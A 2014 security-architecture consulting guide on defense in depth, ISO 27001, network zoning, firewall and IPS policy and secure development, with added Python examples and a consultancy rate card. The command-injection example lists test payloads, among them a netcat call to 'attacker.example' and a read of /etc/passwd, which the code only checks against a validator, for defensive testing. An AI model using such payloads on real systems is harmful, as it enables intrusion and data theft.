
Security Architecture Best Practice Guide
Professional services security and architecture consulting by Bob Panic
September 2014
Final
Final
by Bob Panic,
Director & Principal Consultant
Rock Star Consulting Group
www.rockstarconsultinggroup.com
+61 424 102 603
bob_panic@me.com
Skype: bob.panic

Security Architecture an introduction to best practice
by Bob Panic
Information security is a process whose objective is to ensure the
confidentiality, integrity and availability of an organisation's information.
To be comprehensive, an information security program should be founded on a
sound information security policy, supported by appropriate technology (such
as anti-virus, access control mechanisms, firewalls and intrusion detection
systems), resiliency mechanisms and regular monitoring of the implemented
controls.
Industry best practice recommends a defense-in-depth approach to implementing
information security.
Defense in depth combines several different security components, such as
firewalls, IDS/IPS, anti-virus software, operating system security and
application security, so that no single control is relied upon: an attacker
who defeats one layer must still defeat the next. A multi-layer security
architecture, supported by a comprehensive information security policy, can
significantly reduce the risk of a successful attack.

- The Security Model
Implementing security to the required level means following the
defense-in-depth strategy throughout. The overall Security Model is
depicted as follows:
At the highest level sits the Security Policy.
This Security Policy is realised by implementing a Security Management
Framework that manages the overall security of the entire system in
accordance with the ISO 27001 standard.
At the broad level, the Security Model should ensure the security of all
assets and ensure that no interference with service delivery is possible.
The system should be set up so that it is not possible to alter any data,
bypass any processing stage or change the priority of any work item
without authorisation.
Each action should be carried out in such a way that clear accountability
can be established both for the authorisation of that action and for its
performance.
Adopt a defense-in-depth strategy to protect the confidentiality, integrity and
availability of the information as well as the assets that hold it.
This strategy covers security at every layer: Physical, Perimeter, Network,
Operating System and Application. Accordingly, develop all the policies and
procedures required for the implementation and management of the solution,
based on the international security standard ISO 27001.
ISO 27001 encompasses administrative, operational, technological and physical
security measures. The 11 domains below are the Annex A control clauses of
ISO/IEC 27001:2005; the 2013 revision of the standard regroups the controls into
14 domains, so map these to the current edition when using them as a checklist:
Information security policy
Organization of information security
Asset management
Human resource security
Physical and environmental security
Communications and operations management
Access control
Information systems acquisition, development & maintenance
Information security incident management
Business continuity management
Compliance
Every component of the Security Architecture Solution should be designed
with security as one of its critical design factors.
- overall IT security architecture proposed: 3 Main Factors
Network Security
Firewalls
Intrusion Prevention System (IPS)
Antivirus System
Log management and correlation
E-mail security
Patch Management
Domain Controllers

Application & Database Security
User & Role Management
Authentication & Authorization
Cryptographic Services for Digital Signature and Encryption
Audit Logs

Security Management
Information Security Policies and Procedures
Business Continuity / Disaster Recovery plan
Security Audits and Penetration tests
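The accountability requirement of the Security Model (every action attributable to whoever authorised it and whoever performed it) and the Audit Logs and Cryptographic Services items under Application & Database Security are usually met together, with a tamper-evident audit log. The following is an added example written for this guide, not code from the guide or from any product it names. Each entry records actor, action, target and authoriser and carries an HMAC over the previous entry's tag and its own canonical content, so editing, deleting or reordering any entry breaks the chain. The key, the field names and the sample entries are constructed for the example; in production the key would live in an HSM or key management service.

```python
import hashlib
import hmac
import json
from typing import List, Optional

# Assumption for this example: the MAC key would come from an HSM or key
# management service; a constructed constant stands in for it here.
AUDIT_KEY = b"constructed-demo-key-not-for-production"
GENESIS_TAG = "00" * 32  # hex of 32 zero bytes; anchors the chain for entry 0


def _tag(prev_tag_hex: str, record: dict) -> str:
    """HMAC-SHA256 over the previous entry's tag and this record's canonical JSON.

    Sorted keys and no whitespace make the serialisation independent of dict
    ordering, so verification can rebuild exactly the bytes that were tagged.
    """
    payload = json.dumps(record, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(AUDIT_KEY, bytes.fromhex(prev_tag_hex) + payload,
                    hashlib.sha256).hexdigest()


class AuditLog:
    """Append-only log in which every entry is chained to its predecessor."""

    def __init__(self) -> None:
        self.entries: List[dict] = []

    def append(self, actor: str, action: str, target: str, authorised_by: str) -> dict:
        # Both the authoriser and the performer are recorded, so accountability
        # for the approval and for the execution of the action can be fixed later.
        record = {
            "seq": len(self.entries),
            "actor": actor,
            "action": action,
            "target": target,
            "authorised_by": authorised_by,
        }
        prev = self.entries[-1]["tag"] if self.entries else GENESIS_TAG
        entry = {**record, "tag": _tag(prev, record)}
        self.entries.append(entry)
        return entry

    def verify(self) -> Optional[int]:
        """Return the index of the first entry that fails verification, or None.

        Catches edited fields (tag mismatch) and deleted or reordered entries
        (seq no longer equals position and the chain breaks). Removing entries
        from the tail is NOT detected here: that needs the latest tag exported
        periodically to a separate system and compared against.
        """
        prev = GENESIS_TAG
        for i, entry in enumerate(self.entries):
            record = {k: v for k, v in entry.items() if k != "tag"}
            expected = _tag(prev, record)
            if record.get("seq") != i or not hmac.compare_digest(entry.get("tag", ""), expected):
                return i
            prev = entry["tag"]
        return None
```

Without the key an attacker who gains write access to the log store can alter entries but cannot recompute valid tags, so the first altered entry is reported; the truncation gap noted in `verify` is why the current tag should be anchored outside the system that writes the log.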


- overall security architecture proposed: detail
Network Security

Separate zones in the Data Centre connect homogeneous sets of servers: servers
running one application, servers integrating a set of applications, or servers
accessed by one category of users. Zoning restricts access to network and
application resources to the intended users only, and lets the firewall policy
between zones be written and audited per zone rather than per host.
The following zones should be implemented in the Data Centre. The function of
each zone and its IT equipment is explained in the subsequent sections:

External server segment
Local server segment
IFMIS server segment
Admin segment
Internal Network

- overall security architecture: A Proposed Solution
When it comes to information security these days, it's a mixed-up, muddled-up world out
there. The terms used to describe network defense capabilities are as blurry and hard to pin
down as the latest flavour of blended threat. Not surprisingly, the result is a growing state of
misunderstanding and confusion, culminating in an inability to readily separate fact from
fiction. Indeed, amid the haze of imprecision there is even a proposition that achieving
comprehensive network-based protection requires little more than intrusion prevention and, of
course, firewall capabilities.
A comprehensive solution should be implemented that not only protects all network resources
from threats at every level, but also provides interoperability, seamless implementation and
centralised management. A network-based security approach has the advantage of at least
intending to stop threats before they spread throughout an organisation's entire computing
environment; it complements, rather than replaces, the host and application controls described
later in this guide. To achieve this, firewalls with an integrated SSL gateway and intrusion
prevention capabilities should be put in place.
The appliance-based firewall combines a feature-rich security operating system with dedicated
processors to provide a high-performance array of security and network functions, including:
firewall, VPN and traffic shaping
Intrusion Prevention System (IPS)
antivirus / antispyware / antimalware
web filtering
anti-spam
multiple redundant WAN interface options

These dedicated appliances provide comprehensive protection against network-, content- and
application-level threats, including the complex attacks favoured by cyber criminals, without
degrading network availability and uptime. The proposed platform includes sophisticated
networking features such as high availability (active/active, active/passive) for maximum
network uptime, and virtual domain capabilities to separate networks that require different
security policies.
The firewall policies control all traffic attempting to pass through the appliance, between
interfaces, zones and VLAN sub-interfaces. When the firewall receives the first packet of a
connection, it reads the packet's source address, destination address and service (protocol and
port number) and searches the policy list, top down, for the first policy matching the packet. A
connection that matches no policy should fall through to an implicit deny at the end of the list
and be logged. The appliance provides a secure connection between remote clients and the unit
through the SSL VPN. Once the connection is established, the unit gives access to selected
services and network resources through a web portal. The appliance delivers antivirus protection
to HTTP, FTP, IMAP, POP3, SMTP, IM and NNTP sessions; note that content inside TLS (HTTPS, IMAPS,
SMTP with STARTTLS) can only be scanned where the appliance is configured to inspect that traffic,
otherwise those sessions pass the scanner opaque. The antivirus function consists of several
modules and engines that perform separate tasks. The unit performs antivirus processing in the
following order:
File size
File pattern
File type
Virus scan
Grayware
Heuristics
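The zone model described under Network Security and the policy lookup described above (source address, destination address, service, first matching policy) are simple to state and easy to get wrong in ordering. The following is an added example written for this guide, not vendor code or configuration: it maps addresses to the guide's zones, evaluates a first-match policy list with an implicit deny, and audits the list for policies that are shadowed by a broader rule above them. The address prefixes, the extra "internet" zone for the WAN side and the sample policies are assumptions made for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple

# Constructed addressing for the zones named in the guide; the guide gives no
# prefixes, so these are assumptions. Zones are matched in order, so the
# catch-all "internet" zone (the WAN side) must stay last.
ZONES = {
    "external_servers": ip_network("203.0.113.0/24"),  # internet-facing servers (DMZ)
    "local_servers":    ip_network("10.10.0.0/24"),
    "ifmis_servers":    ip_network("10.20.0.0/24"),
    "admin":            ip_network("10.30.0.0/24"),
    "internal":         ip_network("10.100.0.0/16"),   # user network
    "internet":         ip_network("0.0.0.0/0"),       # catch-all, must be last
}


@dataclass(frozen=True)
class Policy:
    name: str
    src_zone: str            # zone name or "any"
    dst_zone: str
    proto: str               # "tcp", "udp" or "any"
    dst_port: Optional[int]  # None matches any port
    action: str              # "accept" or "deny"

    def matches(self, src_zone: str, dst_zone: str, proto: str, dst_port: int) -> bool:
        return (self.src_zone in (src_zone, "any")
                and self.dst_zone in (dst_zone, "any")
                and self.proto in (proto, "any")
                and self.dst_port in (dst_port, None))

    def covers(self, other: "Policy") -> bool:
        """True if every flow `other` could match is already matched by this policy."""
        return (self.src_zone in (other.src_zone, "any")
                and self.dst_zone in (other.dst_zone, "any")
                and self.proto in (other.proto, "any")
                and (self.dst_port is None or self.dst_port == other.dst_port))


# Sample policy list (assumed). Order matters: the first match wins.
POLICIES: List[Policy] = [
    Policy("internet-to-dmz-https", "internet",         "external_servers", "tcp", 443,  "accept"),
    Policy("dmz-to-local-app",      "external_servers", "local_servers",    "tcp", 8443, "accept"),
    Policy("users-to-ifmis-https",  "internal",         "ifmis_servers",    "tcp", 443,  "accept"),
    Policy("admin-ssh-to-ifmis",    "admin",            "ifmis_servers",    "tcp", 22,   "accept"),
    Policy("admin-ssh-to-local",    "admin",            "local_servers",    "tcp", 22,   "accept"),
    # Explicit deny so that DMZ hosts probing the finance segment are logged by name.
    Policy("deny-dmz-to-ifmis",     "external_servers", "ifmis_servers",    "any", None, "deny"),
]


def zone_of(addr: str) -> str:
    """Map an address to the first zone whose prefix contains it."""
    ip = ip_address(addr)
    for name, net in ZONES.items():
        if ip in net:
            return name
    raise ValueError("address belongs to no zone")


def evaluate(src: str, dst: str, proto: str, dst_port: int,
             policies: List[Policy] = POLICIES) -> Tuple[str, str]:
    """Return (action, policy name) for the first matching policy.

    Traffic matching no policy falls through to the implicit deny, which is how
    a zone firewall should be configured so that a forgotten rule fails closed.
    """
    src_zone, dst_zone = zone_of(src), zone_of(dst)
    for policy in policies:
        if policy.matches(src_zone, dst_zone, proto, dst_port):
            return policy.action, policy.name
    return "deny", "implicit-deny"


def shadowed_policies(policies: List[Policy]) -> List[str]:
    """Names of policies that can never match because an earlier policy covers them.

    A shadowed deny is the classic audit finding: the administrator believes a
    flow is blocked while a broader accept above it lets the traffic through.
    """
    return [later.name
            for i, later in enumerate(policies)
            if any(earlier.covers(later) for earlier in policies[:i])]


if __name__ == "__main__":
    print(evaluate("10.100.5.7", "10.20.0.10", "tcp", 443))   # users to IFMIS over HTTPS
    print(evaluate("10.100.5.7", "10.20.0.10", "tcp", 22))    # users may not SSH to IFMIS
    print(shadowed_policies([Policy("allow-all", "any", "any", "any", None, "accept")] + POLICIES))
```

Run the shadow check whenever the policy list changes; an "allow any/any" placed above the list, as in the last line of the demo, silently disables every policy beneath it, including the explicit deny.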

The three parts of the web filtering function, content blocking, URL filtering and the web
filter itself, interact to provide maximum control and protection for Internet users. The
appliance is to be configured to manage unsolicited commercial e-mail by detecting and
identifying spam messages from known or suspected spam servers.
The antispam service uses both a sender IP reputation database and a spam signature
database, along with spam filtering tools, to detect and block a wide range of spam messages.
The Intrusion Prevention System combines signature-based and anomaly-based detection and
prevention with low latency and high reliability.
The unit logs suspicious traffic, sends alert e-mails to system administrators, and logs,
passes or blocks suspicious packets or sessions.
The Intrusion Prevention System matches network traffic against patterns contained in attack
signatures.
Signatures reliably protect the network from known attacks only; their value depends on the
vendor rapidly identifying new threats and shipping new signatures, so the signature feed must
be kept current. Multiple IPS sensors should be created, each containing a complete
signature-based configuration, so that different firewall policies can apply different sensors.
DoS sensors are also proposed, to examine traffic for anomaly-based attacks.

- security architecture: A Proposed Solution: E-mail Security
E-mail statistics are derived from the e-mail protocols: POP3 and IMAP traffic is counted as
incoming e-mail and SMTP as outgoing e-mail. Gateway-level e-mail security should be provided by
the firewall with integrated SSL VPN. The appliance supports antivirus protection for IMAP, POP3,
SMTP and IM sessions; it is proposed to configure spam filtering for IMAP, POP3 and SMTP e-mail.

- security architecture: Server Security
A comprehensive solution must be implemented that not only protects all network resources from
threats at every level, but also provides interoperability, seamless implementation and
centralised management. To achieve this at the server level, use a group of products providing
the following capabilities:
Antivirus / Anti-spam
Patch Management
HIDS/HIPS
Domain controllers
A Proposed Solution
To provide security at the operating system layer, the following key points have to be
considered:
Use dedicated servers for applications and databases. Sharing servers with other
applications introduces more complexity and risk.
Maintain a current, well-patched operating system on all systems (servers, desktops). This
eliminates well-known bugs that the vendor has already addressed.
Restrict access to the servers to authorised users only.
Harden servers and desktops using industry best practices and security benchmarks.
Deploy a Host Intrusion Detection System (HIDS) to protect the servers from attacks and
unauthorised use.
Deploy an antivirus solution to protect the servers from viruses and worms.
Provide backup and restoration mechanisms for important/critical data and system files, and
test that restores actually work.
Properly configure the required policies (auditing, password, user rights, etc.) on the
servers based on industry best practices and security benchmarks.

Anti-virus / Anti-Spam
All application servers, database servers and web servers should run current anti-virus
engines and signatures to detect new viruses, and these should be updated frequently.
Additional controls such as disabling removable drives and controlling Internet site access
and downloads have to be implemented for further data security. One can consider Symantec
Protection Suite for antivirus and anti-spam, or any other suitable product.

Patch Management
One can consider CA IT Client Manager Solution for patch management

HIDS/HIPS
Symantec Critical System Protection

Domain controllers
For Domain controller one can consider Microsoft Windows solution.

E-mail Security
Symantec Protection Suite Enterprise Edition addresses this need by including the following
industry-leading mail security solutions to protect the infrastructure from e-mail-borne threats:
Symantec Brightmail Gateway
Web Gateway URL filtering

- security architecture: Application & Database Security
Though infrastructure security is a critical element of the overall security paradigm,
application security is an equally critical area where security is often slack, providing a
back door through which attackers compromise computer systems.

Application security is also significant because application-level attacks often cannot be
blocked or detected by infrastructure security components: to a firewall or network IPS, a SQL
injection or a broken access check is simply valid HTTP to an allowed port.

We recognise the importance of application security in operating a truly secure IT
infrastructure. Application security has two primary objectives:
Ensure that the data an application creates, updates, stores and/or transmits is protected from
unauthorised disclosure, tampering, corruption and destruction, whether by the application's
users, by processes external to the application, or by the application itself; and
Provide another security layer within the overall system.

The application and database security requirements can be broken down into the following:

1. Secure Application Development Methodology
2. Security requirements of the application
3. Database security requirements
- Secure Application Development Methodology
The following diagram describes the methodology we have adopted for assessing and managing
security in applications. The activities listed below are followed during development of the
solution to ensure compliance with standards and guidelines such as ISO 27001.

- Security design review
Reviewing the application architecture design against the security requirements in the
software requirement specification (SRS) points out possible security loopholes in the
application design which could result in information disclosure, memory exhaustion, denial of
service, buffer overflows and similar failures.
As part of the design review, threat modelling should be applied, using a proprietary threat
analysis tool to record and manage the risks to the applications being developed. The following
diagram gives a brief description of the process to be followed.

- Security code review
The code review of the application ensures that the code complies with
the secure coding standard: that it has robust validation mechanisms,
robust authentication and access control mechanisms, and is robust
overall.
The review covers areas such as:
Un-validated parameters
Broken access control
Buffer overflows
Command injection flaws
Error handling problems
Insecure use of cryptography
Remote administration flaws
Client-server communication
Connection time-outs
- Security testing
Security testing of the application simulates attacks on the application
as an attacker would, attempting to penetrate it to find weaknesses in
the following areas:
Authentication mechanism
Access Control
Data validation
Buffer overflow
Denial of Service (DoS)
Information disclosure
Error handling
Insecure configuration
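The command injection item in the code review list and the data validation and error handling items in the testing list are the same defect seen from two sides. The following is an added example written for this guide (illustrative code, not from the guide, a client system or any product): a hypothetical finding as a reviewer would see it, its hardened form, and the payload harness a security tester would run against both. The "ping" feature, the payloads and all function names are constructed for the example.

```python
import re
import subprocess
from typing import Dict, List

# RFC 1123 hostname labels; dotted-quad IPv4 literals also match. Used with
# re.fullmatch so a trailing newline cannot slip past an end anchor.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def vulnerable_ping_command(host: str) -> str:
    """The finding as reviewed: returns the string the original code handed to
    subprocess.run(..., shell=True).

    The un-validated parameter is spliced straight into a shell command, so a
    `;`, `&&`, `|`, `$(...)` or newline in `host` becomes a second command run
    with the application's privileges. Nothing here executes it.
    """
    return f"ping -c 1 {host}"


def hardened_ping_argv(host: str) -> List[str]:
    """Hardened form: validate the parameter, then build an argv list, no shell.

    Rejecting anything that is not a hostname or IPv4 literal removes the
    metacharacters; passing a list means there is no shell to interpret them
    anyway (two layers, in the spirit of defense in depth). The error message
    deliberately does not echo the input, so it cannot be used to probe the
    filter or to inject into logs.
    """
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError("host must be a valid hostname or IPv4 address")
    return ["ping", "-c", "1", host]


def safe_ping(host: str) -> bool:
    """Run the hardened command. Not exercised by the tests (needs a network)."""
    result = subprocess.run(hardened_ping_argv(host), capture_output=True, timeout=10)
    return result.returncode == 0


# Constructed attack payloads of the kind a security tester sends to the
# "host" parameter; each exercises a different shell construct.
ATTACK_PAYLOADS = [
    "8.8.8.8; cat /etc/passwd",
    "example.com && id",
    "$(whoami)",
    "`id`",
    "host|nc attacker.example 4444",
    "host\nid",
]
SHELL_METACHARS = set(";&|$`\n<>")


def run_injection_tests(payloads: List[str] = ATTACK_PAYLOADS) -> Dict[str, int]:
    """Feed each payload to both implementations without executing anything.

    Counts payloads whose resulting shell string still carries a metacharacter
    (exploitable in the vulnerable version) and records how the hardened
    version disposed of them. A test suite asserts hardened_accepted == 0.
    """
    results = {"vulnerable_exploitable": 0, "hardened_rejected": 0, "hardened_accepted": 0}
    for payload in payloads:
        if SHELL_METACHARS & set(vulnerable_ping_command(payload)):
            results["vulnerable_exploitable"] += 1
        try:
            hardened_ping_argv(payload)
            results["hardened_accepted"] += 1
        except ValueError:
            results["hardened_rejected"] += 1
    return results
```

The harness is what turns a review finding into a regression test: once `run_injection_tests` is in the suite, a later developer who reintroduces string formatting with `shell=True` fails the build instead of shipping the flaw again.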

- Conclusion
To summarise, we use an end-to-end security approach for all phases of
application development and incorporate application security assessment
services using tools such as security code review and automated application
security scanners. The following diagram depicts the entire process in
simplified form:

About some of our key staff
Bob Panic Solutions Architect/Principal Consultant: delivery planner, business consultant, entrepreneur,
specialist business systems consultant (Enterprise Resource Planning, Logistics and Supply Chain), security
process director, project delivery manager. I bring over 25 years of professional business consultancy and
manage large, complex projects, liaising with senior leadership (directors, CEOs, investors) and leading
teams. I work with strict governance and business processes to ensure that clients' budgets are protected
and funds allocated accordingly, with a zero-tolerance policy on waste and full prudential controls of
operating budgets. At Satyam from 2002 to 2008 I was responsible for successfully leading the $100 Million
(AUD) Core Banking Platform upgrade project for National Australia Bank. In 2013, I was the principal
security and risk manager for the $1.5 Billion (AUD) Gold Coast University Hospital (Queensland Government),
where I was ultimately responsible for ensuring that the hospital was ready for its October 2013 opening to
the public (emergency and operating theatres).
LinkedIn Profile: http://www.linkedin.com/pub/bob-panic/6/185/62a

Silvi Bozo Chief of Staff: NAATI-certified translator from English to Albanian, multilingual, fluent in English,
Albanian and Italian, with professional studies in Russian and Japanese. Silvi has a BA of Business from RMIT (Australia)
and has been a founding member of our business.
LinkedIn Profile: http://www.linkedin.com/pub/silvi-bozo/55/3b/698

Jonia Tamburi Director of Communications: B.A. in Modern Languages, Literatures & Cultures with a
concentration in Spanish and German (2004) and M.A. in Communication Studies (2011). Jonia is an
Albanian native and Canadian resident living and working in the USA as a college professor.
LinkedIn Profile: http://www.linkedin.com/pub/jonia-tamburi/7/413/933

Professional services - Rate card
As part of our general operating policy of openness and transparency, the following are our terms and conditions (overview)
and rate card for global provision of professional services. The rate card comes with a guarantee of service and quality.
Invoices for professional services are paid directly to CXC Global, in the agreed currency (AUD, EUR, USD), as per the
terms and conditions agreed by both parties. A working week can be agreed as either 5 or 6 days. A working day is 12 to 14 hours
on average.

General terms:
Travel and accommodation is to be provided and paid for by the client for the duration of all interstate and
international assignments. Travel insurance is included in the daily professional services rate of all our professional
consultants.
A one-off 15 days advanced payment for professional services to be paid for by the client before any international
assignment commences
7 day invoice terms. One invoice for all professional services
Operating capital and all incurred business expenses are the responsibility of the client
Daily rate is inclusive of all insurances, superannuation, and food. It is a fixed, landed rate + GST

Rate Card:

Daily Rate Professional
$ On Request Rock Star Consulting Group Legal Counsel: international law, intellectual
property law, trademark protection, contracts.
$1500 AUD per day Bob Panic Solutions Architect, central contact
$950 AUD per day Silvi Bozo Chief of Staff, Change Manager, Security Systems Integration
$1000 USD per day Jonia Tamburi Communications Director, Negotiator, professional support
services
For further details contact: Bob Panic
+61 424 102 603
Bob_panic@me.com
